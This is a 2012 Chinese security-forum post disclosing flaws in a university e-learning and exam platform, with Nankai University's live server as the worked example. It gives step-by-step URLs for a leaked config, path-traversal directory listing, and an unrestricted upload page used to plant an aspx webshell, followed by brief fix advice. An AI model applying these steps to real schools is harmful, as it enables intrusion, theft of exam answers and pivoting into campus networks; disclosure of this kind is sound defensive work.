找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2293|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中- I  S! Q/ T/ b! u6 R8 t
+ }0 g4 ]" G& e  O  h
详细说明:
( s2 B" F7 [" v9 z: O  e0 F $ x1 F2 \  v: z; b8 \8 e5 f) m
以南开大学的为例: + h7 ~4 z5 I4 e9 i
http://222.30.60.3/NPELS
3 y% w  [8 X  t; N6 D4 I/ l4 O0 aNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
/ s8 m7 `( z' ?9 A' O* p<setting name="Update_CommonSvr_CommonService" serializeAs="String">+ Y4 j; W) w- U$ b1 r
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
, h" |; |/ N4 C</setting># @1 a4 F9 t5 Z7 l
及版本号" {) l& a8 C' R4 G  ]* x/ I/ j" l8 K
<add key="TVersion" value="1, 0, 0, 2187">
+ J" l4 t* Y1 @' _</add>
) a- I$ C( d) K8 P) D( C- F直接访问
# v) y# F! u9 F  \" j2 Fhttp://222.30.60.3/NPELS/CommonService.asmx
* G1 a3 A4 l5 m; a( [3 I0 i& K( F3 u: `使用GetTestClientFileList操作,直接 HTTP GET 列目录:
8 T" y/ p- y3 xhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187* b; `+ D# n5 ^; \; [
进一步列目录(返回的网页很大,可以直接 wget 下来)- E% L  e) S( D3 y, g+ u7 f1 K% H4 F" I
http://222.30.60.3/NPELS/CommonS ... List?version=../../. ^1 k+ v* p( [
1 u3 P6 ^+ O2 }7 J
发现
8 L# p( y: `  N/ h% L- ohttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
1 ~- D% q- `- _3 i, @7 {可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头/ B& f1 \  ]8 c: _1 A9 s
上传后继续列目录找到木马地址直接访问即可
2 {0 b6 Z9 G0 S; U. b% E + _3 m: p  G& `, n  ^. j& X* y
OOXX
: h! T/ i6 ^- d7 Q
. w9 |4 H& M; F- `Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
0 v8 t9 I# }5 Y' ]! j$ m) p漏洞证明:
$ S7 a% A, \4 s # Z% G% Q# R, }& k, s8 d& E
列目录:+ B( |/ L' |+ e) N" Q
http://222.30.60.3/NPELS/CommonS ... List?version=../../0 P$ V. d8 g  ^+ B
文件上传:
" z8 A1 P2 w2 c# D1 m9 d) ?' @http://222.30.60.3/npelsv/editor/editor.htm2 T: K, q( P* ~0 T" p  I
: A/ Z# m+ P( B; t1 T5 Q
上传木马:) A$ f2 i& v. a/ C- i, [$ _
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
8 T9 g( P0 `) W* o7 ^3 v
9 x& s& R( T. f. h修复方案:5 a4 @8 S' \0 c8 v
好像考试系统必须使用 CommonService.asmx
& ]( Y8 b2 Z6 m# r! a' k6 e" K) W最好配置文件加密或者用别的方式不让它泄露出来+ a( W5 Q* m) m- S9 R+ d! w
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
# r+ U8 r% J- C; q+ b; {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表